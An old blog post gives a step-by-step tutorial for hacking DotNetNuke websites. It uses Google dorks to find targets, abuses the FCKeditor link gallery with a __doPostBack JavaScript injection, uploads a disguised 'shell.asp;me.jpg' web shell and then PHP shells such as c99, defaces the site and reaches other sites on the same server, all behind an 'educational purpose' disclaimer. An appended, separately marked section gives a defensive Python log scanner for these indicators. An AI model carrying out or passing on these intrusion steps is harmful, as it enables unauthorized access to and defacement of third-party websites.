Friday, 6 December 2013

Dot Net Nuke Hacking Tutorial


What is DNN (Dot Net Nuke)?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke mainly provides a Content Management System (CMS) for personal websites.

In this tutorial, I am showing how to hack a website with the DNN exploit.

Step 1:

Go to Google

Step 2:


Now put any of the following dorks in the search box and click Search.
  • inurl:fcklinkgallery.aspx 
  • inurl:/portals/0
  • inurl:/tabid/36/language/en-US/Default.aspx

Step 3:

It will show a list of many sites, select the site which you want to hack.

For example, let's take this:

http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx

Step 4:


Now replace:

home/tabid/36/language/en-US/Default.aspx

With this:

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

So your URL will become:

http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx



Now there are 2 possibilities.

If you get Link Gallery URL select, then the site is not vulnerable; see the image below.

And if you get what is shown in the image below, then the target is vulnerable.

If you have found a vulnerable site, move to the next step.

Step 5:


Now you can see 3 options there and we need to select “File”.




Step 6: After selecting the option, we need to use some JavaScript code, so use a browser that supports JavaScript. Before using the JavaScript, first choose the file location as root; after that, clear everything written in the browser's address bar and paste only the JavaScript below.


javascript:__doPostBack('ctlURL$cmdUpload','')


After injecting the above JavaScript code in the browser address bar, you will get an upload option instead of the selection option.




Step 7: Now you have to upload your shell, so first upload this shell: shell.asp;me.jpg (download the shell from the Download button given at the end of the article).


After uploading, you can access your ASP shell by going to this address:


http://www.vulsite.com/portals/0/yourshell.asp;me.jpg


After opening this address you will get this, and you can upload any PHP shell of yours, e.g. JackelShell.php or c99.php.


Step 8: After uploading your PHP shell, navigate to:


http://www.vulsite.com/portals/0/yourshell.asp;me.jpg


Now upload your deface page in the root of the site.
You can also hack all sites which are hosted on the same server.

Note: Do Not Use Any Tutorial Of This Blog To Harm Anyone. This Is Only For Educational Purpose. I Will Not Be Responsible For Anything Done By You.
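
From the defender's side, the requests in Steps 4 to 8 leave recognizable entries in IIS logs. The following is an added example, not part of the original post: a Python scan of W3C-format IIS log lines for the fcklinkgallery.aspx path, file names of the `shell.asp;me.jpg` form, and script files under /portals/. The log lines, IP addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Indicators taken from the steps above.
GALLERY = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
SEMICOLON_NAME = re.compile(r"\.(asp|aspx|php);[^/]*$", re.I)    # e.g. shell.asp;me.jpg
PORTAL_SCRIPT = re.compile(r"^/portals/.+\.(asp|aspx|php)$", re.I)

def scan(lines):
    """Return (client_ip, rule, method, uri) tuples for suspicious requests."""
    fields, hits = [], []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]        # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        uri = unquote(row.get("cs-uri-stem", ""))   # also catches %3B for ';'
        method, ip = row.get("cs-method", ""), row.get("c-ip", "")
        if uri.lower() == GALLERY:
            rule = "gallery-post" if method == "POST" else "gallery-probe"
        elif SEMICOLON_NAME.search(uri):
            rule = "semicolon-filename"
        elif PORTAL_SCRIPT.match(uri):
            rule = "script-in-portals"
        else:
            continue
        hits.append((ip, rule, method, uri))
    return hits

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2013-12-06 10:00:01 198.51.100.7 GET /home/tabid/36/language/en-US/Default.aspx - 200
2013-12-06 10:00:09 203.0.113.5 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 200
2013-12-06 10:00:40 203.0.113.5 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 200
2013-12-06 10:01:02 203.0.113.5 GET /portals/0/shell.asp;me.jpg - 200
2013-12-06 10:01:30 203.0.113.5 POST /portals/0/c99.php - 200
2013-12-06 10:02:00 198.51.100.7 GET /portals/0/logo.jpg - 200
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit)
```

A script file or a semicolon file name under /portals/ is the stronger signal here, since that folder is meant to hold uploaded content rather than executable pages.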





